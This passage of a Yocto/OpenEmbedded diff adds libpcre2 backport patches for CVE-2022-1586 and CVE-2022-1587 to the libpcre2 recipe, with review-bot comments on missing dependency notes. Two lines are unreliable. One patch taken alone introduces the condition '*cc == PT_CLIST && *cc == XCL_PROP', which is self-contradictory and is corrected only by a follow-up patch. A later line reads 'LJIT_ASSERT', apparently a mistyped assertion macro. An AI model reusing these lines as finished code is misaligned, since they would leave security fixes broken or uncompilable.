29+PCREPOSIX_EXP_DECL size_t pcreposix_regerror(int, const regex_t *, char *, size_t);
30+PCREPOSIX_EXP_DECL void pcreposix_regfree(regex_t *);
31
32 #ifdef __cplusplus
33 } /* extern "C" */
34 #endif
35
36+#define regcomp pcreposix_regcomp
37+#define regexec pcreposix_regexec
38+#define regerror pcreposix_regerror
39+#define regfree pcreposix_regfree
40+
41 #endif /* End of pcreposix.h */
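diff --git a/meta/recipes-support/libpcre/libpcre2/CVE-2022-1586-regression.patch b/meta/recipes-support/libpcre/libpcre2/CVE-2022-1586-regression.patch
new file mode 100644
index 0000000000..42ee417fe7
--- /dev/null
+++ b/meta/recipes-support/libpcre/libpcre2/CVE-2022-1586-regression.patch
@@ -0,0 +1,30 @@
+From 5d1e62b0155292b994aa1c96d4ed8ce4346ef4c2 Mon Sep 17 00:00:00 2001
+From: Zoltan Herczeg <hzmester@freemail.hu>
+Date: Thu, 24 Mar 2022 05:34:42 +0000
+Subject: [PATCH] Fix incorrect value reading in JIT.
+
+CVE: CVE-2022-1586
+Upstream-Status: Backport [https://github.com/PCRE2Project/pcre2/commit/d4fa336fbcc3]
+
+(cherry picked from commit d4fa336fbcc388f89095b184ba6d99422cfc676c)
+Signed-off-by: Shinu Chandran <shinucha@cisco.com>
+---
+ src/pcre2_jit_compile.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/pcre2_jit_compile.c b/src/pcre2_jit_compile.c
+index 493c96d..fa57942 100644
+--- a/src/pcre2_jit_compile.c
++++ b/src/pcre2_jit_compile.c
+@@ -7188,7 +7188,7 @@ while (*cc != XCL_END)
+ {
+ SLJIT_ASSERT(*cc == XCL_PROP || *cc == XCL_NOTPROP);
+ cc++;
+- if (*cc == PT_CLIST && *cc == XCL_PROP)
++ if (*cc == PT_CLIST && cc[-1] == XCL_PROP)
+ {
+ other_cases = PRIV(ucd_caseless_sets) + cc[1];
+ while (*other_cases != NOTACHAR)
+--
+2.25.1
+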
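Review bot: This patch depends on CVE-2022-1586.patch from the same commit, but its header does not say so: the line it removes, `if (*cc == PT_CLIST && *cc == XCL_PROP)`, exists only after that patch is applied. That earlier condition compares one byte against two constants, so unless the constants are equal the caseless-set branch is never taken until this fix lands. I would add a header line such as `Depends on CVE-2022-1586.patch; corrects the condition that patch introduced.` and check that the recipe lists the two in that order. The hunk is anchored at line 7188 while the first patch edits the same statement at line 7119, so it was generated against a different tree and should be confirmed to apply without fuzz. As far as this page shows, no test case accompanies the corrected condition.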
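--- /dev/null
+++ b/meta/recipes-support/libpcre/libpcre2/CVE-2022-1586.patch
@@ -0,0 +1,59 @@
+From 233c4248550d0c1d9bfee42198d5ee0855b7d413 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Mon, 23 May 2022 13:52:39 +0530
+Subject: [PATCH] CVE-2022-1586
+
+Upstream-Status: Backport from https://github.com/PCRE2Project/pcre2/commit/50a51cb7e67268e6ad417eb07c9de9bfea5cc55a
+
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ ChangeLog | 3 +++
+ src/pcre2_jit_compile.c | 2 +-
+ src/pcre2_jit_test.c | 4 ++++
+ 3 files changed, 8 insertions(+), 1 deletion(-)
+
+diff --git a/ChangeLog b/ChangeLog
+index 0926c29..b5d72dc 100644
+--- a/ChangeLog
++++ b/ChangeLog
+@@ -1,6 +1,9 @@
+ Change Log for PCRE2
+ --------------------
+
++23. Fixed a unicode properrty matching issue in JIT. The character was not
++fully read in caseless matching.
++
+
+ Version 10.34 21-November-2019
+ ------------------------------
+diff --git a/src/pcre2_jit_compile.c b/src/pcre2_jit_compile.c
+index f564127..5d43865 100644
+--- a/src/pcre2_jit_compile.c
++++ b/src/pcre2_jit_compile.c
+@@ -7119,7 +7119,7 @@ while (*cc != XCL_END)
+ {
+ SLJIT_ASSERT(*cc == XCL_PROP || *cc == XCL_NOTPROP);
+ cc++;
+- if (*cc == PT_CLIST)
++ if (*cc == PT_CLIST && *cc == XCL_PROP)
+ {
+ other_cases = PRIV(ucd_caseless_sets) + cc[1];
+ while (*other_cases != NOTACHAR)
+diff --git a/src/pcre2_jit_test.c b/src/pcre2_jit_test.c
+index a9b3880..9df87fd 100644
+--- a/src/pcre2_jit_test.c
++++ b/src/pcre2_jit_test.c
+@@ -408,6 +408,10 @@ static struct regression_test_case regression_test_cases[] = {
+ { MUP, A, 0, 0 | F_PROPERTY, "[\xc3\xa2-\xc3\xa6\xc3\x81-\xc3\x84\xe2\x80\xa8-\xe2\x80\xa9\xe6\x92\xad\\p{Zs}]{2,}", "\xe2\x80\xa7\xe2\x80\xa9\xe6\x92\xad \xe6\x92\xae" },
+ { MUP, A, 0, 0 | F_PROPERTY, "[\\P{L&}]{2}[^\xc2\x85-\xc2\x89\\p{Ll}\\p{Lu}]{2}", "\xc3\xa9\xe6\x92\xad.a\xe6\x92\xad|\xc2\x8a#" },
+ { PCRE2_UCP, 0, 0, 0 | F_PROPERTY, "[a-b\\s]{2,5}[^a]", "AB baaa" },
++ { MUP, 0, 0, 0 | F_NOMATCH, "[^\\p{Hangul}\\p{Z}]", " " },
++ { MUP, 0, 0, 0, "[\\p{Lu}\\P{Latin}]+", "c\xEA\xA4\xAE,A,b" },
++ { MUP, 0, 0, 0, "[\\x{a92e}\\p{Lu}\\P{Latin}]+", "c\xEA\xA4\xAE,A,b" },
++ { CMUP, 0, 0, 0, "[^S]\\B", "\xe2\x80\x8a" },
+
+ /* Possible empty brackets. */
+ { MU, A, 0, 0, "(?:|ab||bc|a)+d", "abcxabcabd" },
+--
+2.25.1
+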
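Review bot: The patch header gives no hint that this change is incomplete on its own: the new test `if (*cc == PT_CLIST && *cc == XCL_PROP)` compares the same byte with two different constants, and only the follow-up CVE-2022-1586-regression.patch changes the second operand to `cc[-1]`. Anyone carrying this file alone would get a condition that, unless the two constants happen to be equal, disables the PT_CLIST branch instead of restricting it. I would add a header line such as `Note: requires CVE-2022-1586-regression.patch (upstream d4fa336fbcc3)`, together with a `CVE: CVE-2022-1586` tag and the bracketed `Upstream-Status: Backport [URL]` form the sibling patches use. The enclosing `while (*cc != XCL_END)` loop starts and ends outside the hunk.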
diff --git a/meta/recipes-support/libpcre/libpcre2/CVE-2022-1587.patch b/meta/recipes-support/libpcre/libpcre2/CVE-2022-1587.patch
new file mode 100644
index 0000000000..70f9f9f079
--- /dev/null
+++ b/meta/recipes-support/libpcre/libpcre2/CVE-2022-1587.patch
@@ -0,0 +1,660 @@
1From aa5aac0d209e3debf80fc2db924d9401fc50454b Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Mon, 23 May 2022 14:11:11 +0530
4Subject: [PATCH] CVE-2022-1587
5
6Upstream-Status: Backport [https://github.com/PCRE2Project/pcre2/commit/03654e751e7f0700693526b67dfcadda6b42c9d0]
7CVE: CVE-2022-1587
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9
10---
11 ChangeLog | 3 +
12 src/pcre2_jit_compile.c | 290 ++++++++++++++++++++++++++--------------
13 src/pcre2_jit_test.c | 1 +
14 3 files changed, 194 insertions(+), 100 deletions(-)
15
16diff --git a/ChangeLog b/ChangeLog
17index b5d72dc..de82de9 100644
18--- a/ChangeLog
19+++ b/ChangeLog
20@@ -4,6 +4,9 @@ Change Log for PCRE2
21 23. Fixed a unicode properrty matching issue in JIT. The character was not
22 fully read in caseless matching.
23
24+24. Fixed an issue affecting recursions in JIT caused by duplicated data
25+transfers.
26+
27
28 Version 10.34 21-November-2019
29 ------------------------------
30diff --git a/src/pcre2_jit_compile.c b/src/pcre2_jit_compile.c
31index 5d43865..493c96d 100644
32--- a/src/pcre2_jit_compile.c
33+++ b/src/pcre2_jit_compile.c
34@@ -407,6 +407,9 @@ typedef struct compiler_common {
35 /* Locals used by fast fail optimization. */
36 sljit_s32 fast_fail_start_ptr;
37 sljit_s32 fast_fail_end_ptr;
38+ /* Variables used by recursive call generator. */
39+ sljit_s32 recurse_bitset_size;
40+ uint8_t *recurse_bitset;
41
42 /* Flipped and lower case tables. */
43 const sljit_u8 *fcc;
44@@ -2109,19 +2112,39 @@ for (i = 0; i < RECURSE_TMP_REG_COUNT; i++)
45
46 #undef RECURSE_TMP_REG_COUNT
47
48+static BOOL recurse_check_bit(compiler_common *common, sljit_sw bit_index)
49+{
50+uint8_t *byte;
51+uint8_t mask;
52+
53+SLJIT_ASSERT((bit_index & (sizeof(sljit_sw) - 1)) == 0);
54+
55+bit_index >>= SLJIT_WORD_SHIFT;
56+
57+mask = 1 << (bit_index & 0x7);
58+byte = common->recurse_bitset + (bit_index >> 3);
59+
60+if (*byte & mask)
61+ return FALSE;
62+
63+*byte |= mask;
64+return TRUE;
65+}
66+
67 static int get_recurse_data_length(compiler_common *common, PCRE2_SPTR cc, PCRE2_SPTR ccend,
68 BOOL *needs_control_head, BOOL *has_quit, BOOL *has_accept)
69 {
70 int length = 1;
71-int size;
72+int size, offset;
73 PCRE2_SPTR alternative;
74 BOOL quit_found = FALSE;
75 BOOL accept_found = FALSE;
76 BOOL setsom_found = FALSE;
77 BOOL setmark_found = FALSE;
78-BOOL capture_last_found = FALSE;
79 BOOL control_head_found = FALSE;
80
81+memset(common->recurse_bitset, 0, common->recurse_bitset_size);
82+
83 #if defined DEBUG_FORCE_CONTROL_HEAD && DEBUG_FORCE_CONTROL_HEAD
84 SLJIT_ASSERT(common->control_head_ptr != 0);
85 control_head_found = TRUE;
86@@ -2144,15 +2167,17 @@ while (cc < ccend)
87 setsom_found = TRUE;
88 if (common->mark_ptr != 0)
89 setmark_found = TRUE;
90- if (common->capture_last_ptr != 0)
91- capture_last_found = TRUE;
92+ if (common->capture_last_ptr != 0 && recurse_check_bit(common, common->capture_last_ptr))
93+ length++;
94 cc += 1 + LINK_SIZE;
95 break;
96
97 case OP_KET:
98- if (PRIVATE_DATA(cc) != 0)
99+ offset = PRIVATE_DATA(cc);
100+ if (offset != 0)
101 {
102- length++;
103+ if (recurse_check_bit(common, offset))
104+ length++;
105 SLJIT_ASSERT(PRIVATE_DATA(cc + 1) != 0);
106 cc += PRIVATE_DATA(cc + 1);
107 }
108@@ -2169,39 +2194,55 @@ while (cc < ccend)
109 case OP_SBRA:
110 case OP_SBRAPOS:
111 case OP_SCOND:
112- length++;
113 SLJIT_ASSERT(PRIVATE_DATA(cc) != 0);
114+ if (recurse_check_bit(common, PRIVATE_DATA(cc)))
115+ length++;
116 cc += 1 + LINK_SIZE;
117 break;
118
119 case OP_CBRA:
120 case OP_SCBRA:
121- length += 2;
122- if (common->capture_last_ptr != 0)
123- capture_last_found = TRUE;
124- if (common->optimized_cbracket[GET2(cc, 1 + LINK_SIZE)] == 0)
125+ offset = GET2(cc, 1 + LINK_SIZE);
126+ if (recurse_check_bit(common, OVECTOR(offset << 1)))
127+ {
128+ SLJIT_ASSERT(recurse_check_bit(common, OVECTOR((offset << 1) + 1)));
129+ length += 2;
130+ }
131+ if (common->optimized_cbracket[offset] == 0 && recurse_check_bit(common, OVECTOR_PRIV(offset)))
132+ length++;
133+ if (common->capture_last_ptr != 0 && recurse_check_bit(common, common->capture_last_ptr))
134 length++;
135 cc += 1 + LINK_SIZE + IMM2_SIZE;
136 break;
137
138 case OP_CBRAPOS:
139 case OP_SCBRAPOS:
140- length += 2 + 2;
141- if (common->capture_last_ptr != 0)
142- capture_last_found = TRUE;
143+ offset = GET2(cc, 1 + LINK_SIZE);
144+ if (recurse_check_bit(common, OVECTOR(offset << 1)))
145+ {
146+ SLJIT_ASSERT(recurse_check_bit(common, OVECTOR((offset << 1) + 1)));
147+ length += 2;
148+ }
149+ if (recurse_check_bit(common, OVECTOR_PRIV(offset)))
150+ length++;
151+ if (recurse_check_bit(common, PRIVATE_DATA(cc)))
152+ length++;
153+ if (common->capture_last_ptr != 0 && recurse_check_bit(common, common->capture_last_ptr))
154+ length++;
155 cc += 1 + LINK_SIZE + IMM2_SIZE;
156 break;
157
158 case OP_COND:
159 /* Might be a hidden SCOND. */
160 alternative = cc + GET(cc, 1);
161- if (*alternative == OP_KETRMAX || *alternative == OP_KETRMIN)
162+ if ((*alternative == OP_KETRMAX || *alternative == OP_KETRMIN) && recurse_check_bit(common, PRIVATE_DATA(cc)))
163 length++;
164 cc += 1 + LINK_SIZE;
165 break;
166
167 CASE_ITERATOR_PRIVATE_DATA_1
168- if (PRIVATE_DATA(cc) != 0)
169+ offset = PRIVATE_DATA(cc);
170+ if (offset != 0 && recurse_check_bit(common, offset))
171 length++;
172 cc += 2;
173 #ifdef SUPPORT_UNICODE
174@@ -2210,8 +2251,12 @@ while (cc < ccend)
175 break;
176
177 CASE_ITERATOR_PRIVATE_DATA_2A
178- if (PRIVATE_DATA(cc) != 0)
179+ offset = PRIVATE_DATA(cc);
180+ if (offset != 0 && recurse_check_bit(common, offset))
181+ {
182+ SLJIT_ASSERT(recurse_check_bit(common, offset + sizeof(sljit_sw)));
183 length += 2;
184+ }
185 cc += 2;
186 #ifdef SUPPORT_UNICODE
187 if (common->utf && HAS_EXTRALEN(cc[-1])) cc += GET_EXTRALEN(cc[-1]);
188@@ -2219,8 +2264,12 @@ while (cc < ccend)
189 break;
190
191 CASE_ITERATOR_PRIVATE_DATA_2B
192- if (PRIVATE_DATA(cc) != 0)
193+ offset = PRIVATE_DATA(cc);
194+ if (offset != 0 && recurse_check_bit(common, offset))
195+ {
196+ SLJIT_ASSERT(recurse_check_bit(common, offset + sizeof(sljit_sw)));
197 length += 2;
198+ }
199 cc += 2 + IMM2_SIZE;
200 #ifdef SUPPORT_UNICODE
201 if (common->utf && HAS_EXTRALEN(cc[-1])) cc += GET_EXTRALEN(cc[-1]);
202@@ -2228,20 +2277,29 @@ while (cc < ccend)
203 break;
204
205 CASE_ITERATOR_TYPE_PRIVATE_DATA_1
206- if (PRIVATE_DATA(cc) != 0)
207+ offset = PRIVATE_DATA(cc);
208+ if (offset != 0 && recurse_check_bit(common, offset))
209 length++;
210 cc += 1;
211 break;
212
213 CASE_ITERATOR_TYPE_PRIVATE_DATA_2A
214- if (PRIVATE_DATA(cc) != 0)
215+ offset = PRIVATE_DATA(cc);
216+ if (offset != 0 && recurse_check_bit(common, offset))
217+ {
218+ SLJIT_ASSERT(recurse_check_bit(common, offset + sizeof(sljit_sw)));
219 length += 2;
220+ }
221 cc += 1;
222 break;
223
224 CASE_ITERATOR_TYPE_PRIVATE_DATA_2B
225- if (PRIVATE_DATA(cc) != 0)
226+ offset = PRIVATE_DATA(cc);
227+ if (offset != 0 && recurse_check_bit(common, offset))
228+ {
229+ SLJIT_ASSERT(recurse_check_bit(common, offset + sizeof(sljit_sw)));
230 length += 2;
231+ }
232 cc += 1 + IMM2_SIZE;
233 break;
234
235@@ -2253,7 +2311,9 @@ while (cc < ccend)
236 #else
237 size = 1 + 32 / (int)sizeof(PCRE2_UCHAR);
238 #endif
239- if (PRIVATE_DATA(cc) != 0)
240+
241+ offset = PRIVATE_DATA(cc);
242+ if (offset != 0 && recurse_check_bit(common, offset))
243 length += get_class_iterator_size(cc + size);
244 cc += size;
245 break;
246@@ -2288,8 +2348,7 @@ while (cc < ccend)
247 case OP_THEN:
248 SLJIT_ASSERT(common->control_head_ptr != 0);
249 quit_found = TRUE;
250- if (!control_head_found)
251- control_head_found = TRUE;
252+ control_head_found = TRUE;
253 cc++;
254 break;
255
256@@ -2309,8 +2368,6 @@ SLJIT_ASSERT(cc == ccend);
257
258 if (control_head_found)
259 length++;
260-if (capture_last_found)
261- length++;
262 if (quit_found)
263 {
264 if (setsom_found)
265@@ -2343,14 +2400,12 @@ sljit_sw shared_srcw[3];
266 sljit_sw kept_shared_srcw[2];
267 int private_count, shared_count, kept_shared_count;
268 int from_sp, base_reg, offset, i;
269-BOOL setsom_found = FALSE;
270-BOOL setmark_found = FALSE;
271-BOOL capture_last_found = FALSE;
272-BOOL control_head_found = FALSE;
273+
274+memset(common->recurse_bitset, 0, common->recurse_bitset_size);
275
276 #if defined DEBUG_FORCE_CONTROL_HEAD && DEBUG_FORCE_CONTROL_HEAD
277 SLJIT_ASSERT(common->control_head_ptr != 0);
278-control_head_found = TRUE;
279+recurse_check_bit(common, common->control_head_ptr);
280 #endif
281
282 switch (type)
283@@ -2438,11 +2493,10 @@ while (cc < ccend)
284 {
285 case OP_SET_SOM:
286 SLJIT_ASSERT(common->has_set_som);
287- if (has_quit && !setsom_found)
288+ if (has_quit && recurse_check_bit(common, OVECTOR(0)))
289 {
290 kept_shared_srcw[0] = OVECTOR(0);
291 kept_shared_count = 1;
292- setsom_found = TRUE;
293 }
294 cc += 1;
295 break;
296@@ -2450,33 +2504,31 @@ while (cc < ccend)
297 case OP_RECURSE:
298 if (has_quit)
299 {
300- if (common->has_set_som && !setsom_found)
301+ if (common->has_set_som && recurse_check_bit(common, OVECTOR(0)))
302 {
303 kept_shared_srcw[0] = OVECTOR(0);
304 kept_shared_count = 1;
305- setsom_found = TRUE;
306 }
307- if (common->mark_ptr != 0 && !setmark_found)
308+ if (common->mark_ptr != 0 && recurse_check_bit(common, common->mark_ptr))
309 {
310 kept_shared_srcw[kept_shared_count] = common->mark_ptr;
311 kept_shared_count++;
312- setmark_found = TRUE;
313 }
314 }
315- if (common->capture_last_ptr != 0 && !capture_last_found)
316+ if (common->capture_last_ptr != 0 && recurse_check_bit(common, common->capture_last_ptr))
317 {
318 shared_srcw[0] = common->capture_last_ptr;
319 shared_count = 1;
320- capture_last_found = TRUE;
321 }
322 cc += 1 + LINK_SIZE;
323 break;
324
325 case OP_KET:
326- if (PRIVATE_DATA(cc) != 0)
327+ private_srcw[0] = PRIVATE_DATA(cc);
328+ if (private_srcw[0] != 0)
329 {
330- private_count = 1;
331- private_srcw[0] = PRIVATE_DATA(cc);
332+ if (recurse_check_bit(common, private_srcw[0]))
333+ private_count = 1;
334 SLJIT_ASSERT(PRIVATE_DATA(cc + 1) != 0);
335 cc += PRIVATE_DATA(cc + 1);
336 }
337@@ -2493,50 +2545,66 @@ while (cc < ccend)
338 case OP_SBRA:
339 case OP_SBRAPOS:
340 case OP_SCOND:
341- private_count = 1;
342 private_srcw[0] = PRIVATE_DATA(cc);
343+ if (recurse_check_bit(common, private_srcw[0]))
344+ private_count = 1;
345 cc += 1 + LINK_SIZE;
346 break;
347
348 case OP_CBRA:
349 case OP_SCBRA:
350- offset = (GET2(cc, 1 + LINK_SIZE)) << 1;
351- shared_srcw[0] = OVECTOR(offset);
352- shared_srcw[1] = OVECTOR(offset + 1);
353- shared_count = 2;
354+ offset = GET2(cc, 1 + LINK_SIZE);
355+ shared_srcw[0] = OVECTOR(offset << 1);
356+ if (recurse_check_bit(common, shared_srcw[0]))
357+ {
358+ shared_srcw[1] = shared_srcw[0] + sizeof(sljit_sw);
359+ SLJIT_ASSERT(recurse_check_bit(common, shared_srcw[1]));
360+ shared_count = 2;
361+ }
362
363- if (common->capture_last_ptr != 0 && !capture_last_found)
364+ if (common->capture_last_ptr != 0 && recurse_check_bit(common, common->capture_last_ptr))
365 {
366- shared_srcw[2] = common->capture_last_ptr;
367- shared_count = 3;
368- capture_last_found = TRUE;
369+ shared_srcw[shared_count] = common->capture_last_ptr;
370+ shared_count++;
371 }
372
373- if (common->optimized_cbracket[GET2(cc, 1 + LINK_SIZE)] == 0)
374+ if (common->optimized_cbracket[offset] == 0)
375 {
376- private_count = 1;
377- private_srcw[0] = OVECTOR_PRIV(GET2(cc, 1 + LINK_SIZE));
378+ private_srcw[0] = OVECTOR_PRIV(offset);
379+ if (recurse_check_bit(common, private_srcw[0]))
380+ private_count = 1;
381 }
382+
383 cc += 1 + LINK_SIZE + IMM2_SIZE;
384 break;
385
386 case OP_CBRAPOS:
387 case OP_SCBRAPOS:
388- offset = (GET2(cc, 1 + LINK_SIZE)) << 1;
389- shared_srcw[0] = OVECTOR(offset);
390- shared_srcw[1] = OVECTOR(offset + 1);
391- shared_count = 2;
392+ offset = GET2(cc, 1 + LINK_SIZE);
393+ shared_srcw[0] = OVECTOR(offset << 1);
394+ if (recurse_check_bit(common, shared_srcw[0]))
395+ {
396+ shared_srcw[1] = shared_srcw[0] + sizeof(sljit_sw);
397+ SLJIT_ASSERT(recurse_check_bit(common, shared_srcw[1]));
398+ shared_count = 2;
399+ }
400
401- if (common->capture_last_ptr != 0 && !capture_last_found)
402+ if (common->capture_last_ptr != 0 && recurse_check_bit(common, common->capture_last_ptr))
403 {
404- shared_srcw[2] = common->capture_last_ptr;
405- shared_count = 3;
406- capture_last_found = TRUE;
407+ shared_srcw[shared_count] = common->capture_last_ptr;
408+ shared_count++;
409 }
410
411- private_count = 2;
412 private_srcw[0] = PRIVATE_DATA(cc);
413- private_srcw[1] = OVECTOR_PRIV(GET2(cc, 1 + LINK_SIZE));
414+ if (recurse_check_bit(common, private_srcw[0]))
415+ private_count = 1;
416+
417+ offset = OVECTOR_PRIV(offset);
418+ if (recurse_check_bit(common, offset))
419+ {
420+ private_srcw[private_count] = offset;
421+ private_count++;
422+ }
423 cc += 1 + LINK_SIZE + IMM2_SIZE;
424 break;
425
426@@ -2545,18 +2613,17 @@ while (cc < ccend)
427 alternative = cc + GET(cc, 1);
428 if (*alternative == OP_KETRMAX || *alternative == OP_KETRMIN)
429 {
430- private_count = 1;
431 private_srcw[0] = PRIVATE_DATA(cc);
432+ if (recurse_check_bit(common, private_srcw[0]))
433+ private_count = 1;
434 }
435 cc += 1 + LINK_SIZE;
436 break;
437
438 CASE_ITERATOR_PRIVATE_DATA_1
439- if (PRIVATE_DATA(cc))
440- {
441+ private_srcw[0] = PRIVATE_DATA(cc);
442+ if (private_srcw[0] != 0 && recurse_check_bit(common, private_srcw[0]))
443 private_count = 1;
444- private_srcw[0] = PRIVATE_DATA(cc);
445- }
446 cc += 2;
447 #ifdef SUPPORT_UNICODE
448 if (common->utf && HAS_EXTRALEN(cc[-1])) cc += GET_EXTRALEN(cc[-1]);
449@@ -2564,11 +2631,12 @@ while (cc < ccend)
450 break;
451
452 CASE_ITERATOR_PRIVATE_DATA_2A
453- if (PRIVATE_DATA(cc))
454+ private_srcw[0] = PRIVATE_DATA(cc);
455+ if (private_srcw[0] != 0 && recurse_check_bit(common, private_srcw[0]))
456 {
457 private_count = 2;
458- private_srcw[0] = PRIVATE_DATA(cc);
459- private_srcw[1] = PRIVATE_DATA(cc) + sizeof(sljit_sw);
460+ private_srcw[1] = private_srcw[0] + sizeof(sljit_sw);
461+ SLJIT_ASSERT(recurse_check_bit(common, private_srcw[1]));
462 }
463 cc += 2;
464 #ifdef SUPPORT_UNICODE
465@@ -2577,11 +2645,12 @@ while (cc < ccend)
466 break;
467
468 CASE_ITERATOR_PRIVATE_DATA_2B
469- if (PRIVATE_DATA(cc))
470+ private_srcw[0] = PRIVATE_DATA(cc);
471+ if (private_srcw[0] != 0 && recurse_check_bit(common, private_srcw[0]))
472 {
473 private_count = 2;
474- private_srcw[0] = PRIVATE_DATA(cc);
475- private_srcw[1] = PRIVATE_DATA(cc) + sizeof(sljit_sw);
476+ private_srcw[1] = private_srcw[0] + sizeof(sljit_sw);
477+ SLJIT_ASSERT(recurse_check_bit(common, private_srcw[1]));
478 }
479 cc += 2 + IMM2_SIZE;
480 #ifdef SUPPORT_UNICODE
481@@ -2590,30 +2659,30 @@ while (cc < ccend)
482 break;
483
484 CASE_ITERATOR_TYPE_PRIVATE_DATA_1
485- if (PRIVATE_DATA(cc))
486- {
487+ private_srcw[0] = PRIVATE_DATA(cc);
488+ if (private_srcw[0] != 0 && recurse_check_bit(common, private_srcw[0]))
489 private_count = 1;
490- private_srcw[0] = PRIVATE_DATA(cc);
491- }
492 cc += 1;
493 break;
494
495 CASE_ITERATOR_TYPE_PRIVATE_DATA_2A
496- if (PRIVATE_DATA(cc))
497+ private_srcw[0] = PRIVATE_DATA(cc);
498+ if (private_srcw[0] != 0 && recurse_check_bit(common, private_srcw[0]))
499 {
500 private_count = 2;
501- private_srcw[0] = PRIVATE_DATA(cc);
502 private_srcw[1] = private_srcw[0] + sizeof(sljit_sw);
503+ SLJIT_ASSERT(recurse_check_bit(common, private_srcw[1]));
504 }
505 cc += 1;
506 break;
507
508 CASE_ITERATOR_TYPE_PRIVATE_DATA_2B
509- if (PRIVATE_DATA(cc))
510+ private_srcw[0] = PRIVATE_DATA(cc);
511+ if (private_srcw[0] != 0 && recurse_check_bit(common, private_srcw[0]))
512 {
513 private_count = 2;
514- private_srcw[0] = PRIVATE_DATA(cc);
515 private_srcw[1] = private_srcw[0] + sizeof(sljit_sw);
516+ SLJIT_ASSERT(recurse_check_bit(common, private_srcw[1]));
517 }
518 cc += 1 + IMM2_SIZE;
519 break;
520@@ -2630,14 +2699,17 @@ while (cc < ccend)
521 switch(get_class_iterator_size(cc + i))
522 {
523 case 1:
524- private_count = 1;
525 private_srcw[0] = PRIVATE_DATA(cc);
526 break;
527
528 case 2:
529- private_count = 2;
530 private_srcw[0] = PRIVATE_DATA(cc);
531- private_srcw[1] = private_srcw[0] + sizeof(sljit_sw);
532+ if (recurse_check_bit(common, private_srcw[0]))
533+ {
534+ private_count = 2;
535+ private_srcw[1] = private_srcw[0] + sizeof(sljit_sw);
536+ SLJIT_ASSERT(recurse_check_bit(common, private_srcw[1]));
537+ }
538 break;
539
540 default:
541@@ -2652,28 +2724,25 @@ while (cc < ccend)
542 case OP_PRUNE_ARG:
543 case OP_THEN_ARG:
544 SLJIT_ASSERT(common->mark_ptr != 0);
545- if (has_quit && !setmark_found)
546+ if (has_quit && recurse_check_bit(common, common->mark_ptr))
547 {
548 kept_shared_srcw[0] = common->mark_ptr;
549 kept_shared_count = 1;
550- setmark_found = TRUE;
551 }
552- if (common->control_head_ptr != 0 && !control_head_found)
553+ if (common->control_head_ptr != 0 && recurse_check_bit(common, common->control_head_ptr))
554 {
555 shared_srcw[0] = common->control_head_ptr;
556 shared_count = 1;
557- control_head_found = TRUE;
558 }
559 cc += 1 + 2 + cc[1];
560 break;
561
562 case OP_THEN:
563 SLJIT_ASSERT(common->control_head_ptr != 0);
564- if (!control_head_found)
565+ if (recurse_check_bit(common, common->control_head_ptr))
566 {
567 shared_srcw[0] = common->control_head_ptr;
568 shared_count = 1;
569- control_head_found = TRUE;
570 }
571 cc++;
572 break;
573@@ -2681,7 +2750,7 @@ while (cc < ccend)
574 default:
575 cc = next_opcode(common, cc);
576 SLJIT_ASSERT(cc != NULL);
577- break;
578+ continue;
579 }
580
581 if (type != recurse_copy_shared_to_global && type != recurse_copy_kept_shared_to_global)
582@@ -13262,7 +13331,7 @@ SLJIT_ASSERT(!(common->req_char_ptr != 0 && common->start_used_ptr != 0));
583 common->cbra_ptr = OVECTOR_START + (re->top_bracket + 1) * 2 * sizeof(sljit_sw);
584
585 total_length = ccend - common->start;
586-common->private_data_ptrs = (sljit_s32 *)SLJIT_MALLOC(total_length * (sizeof(sljit_s32) + (common->has_then ? 1 : 0)), allocator_data);
587+common->private_data_ptrs = (sljit_s32*)SLJIT_MALLOC(total_length * (sizeof(sljit_s32) + (common->has_then ? 1 : 0)), allocator_data);
588 if (!common->private_data_ptrs)
589 {
590 SLJIT_FREE(common->optimized_cbracket, allocator_data);
591@@ -13304,6 +13373,7 @@ if (!compiler)
592 common->compiler = compiler;
593
594 /* Main pcre_jit_exec entry. */
595+LJIT_ASSERT((private_data_size & (sizeof(sljit_sw) - 1)) == 0);
596 sljit_emit_enter(compiler, 0, SLJIT_ARG1(SW), 5, 5, 0, 0, private_data_size);
597
598 /* Register init. */
599@@ -13524,20 +13594,40 @@ common->fast_fail_end_ptr = 0;
600 common->currententry = common->entries;
601 common->local_quit_available = TRUE;
602 quit_label = common->quit_label;
603-while (common->currententry != NULL)
604+if (common->currententry != NULL)
605 {
606- /* Might add new entries. */
607- compile_recurse(common);
608- if (SLJIT_UNLIKELY(sljit_get_compiler_error(compiler)))
609+ /* A free bit for each private data. */
610+ common->recurse_bitset_size = ((private_data_size / (int)sizeof(sljit_sw)) + 7) >> 3;
611+ SLJIT_ASSERT(common->recurse_bitset_size > 0);
612+ common->recurse_bitset = (sljit_u8*)SLJIT_MALLOC(common->recurse_bitset_size, allocator_data);;
613+
614+ if (common->recurse_bitset != NULL)
615+ {
616+ do
617+ {
618+ /* Might add new entries. */
619+ compile_recurse(common);
620+ if (SLJIT_UNLIKELY(sljit_get_compiler_error(compiler)))
621+ break;
622+ flush_stubs(common);
623+ common->currententry = common->currententry->next;
624+ }
625+ while (common->currententry != NULL);
626+
627+ SLJIT_FREE(common->recurse_bitset, allocator_data);
628+ }
629+
630+ if (common->currententry != NULL)
631 {
632+ /* The common->recurse_bitset has been freed. */
633+ SLJIT_ASSERT(sljit_get_compiler_error(compiler) || common->recurse_bitset == NULL);
634+
635 sljit_free_compiler(compiler);
636 SLJIT_FREE(common->optimized_cbracket, allocator_data);
637 SLJIT_FREE(common->private_data_ptrs, allocator_data);
638 PRIV(jit_free_rodata)(common->read_only_data_head, allocator_data);
639 return PCRE2_ERROR_NOMEMORY;
640 }
641- flush_stubs(common);
642- common->currententry = common->currententry->next;
643 }
644 common->local_quit_available = FALSE;
645 common->quit_label = quit_label;
646diff --git a/src/pcre2_jit_test.c b/src/pcre2_jit_test.c
647index 9df87fd..2f84834 100644
648--- a/src/pcre2_jit_test.c
649+++ b/src/pcre2_jit_test.c
650@@ -746,6 +746,7 @@ static struct regression_test_case regression_test_cases[] = {
651 { MU, A, 0, 0, "((?(R)a|(?1)){1,3}?)M", "aaaM" },
652 { MU, A, 0, 0, "((.)(?:.|\\2(?1))){0}#(?1)#", "#aabbccdde# #aabbccddee#" },
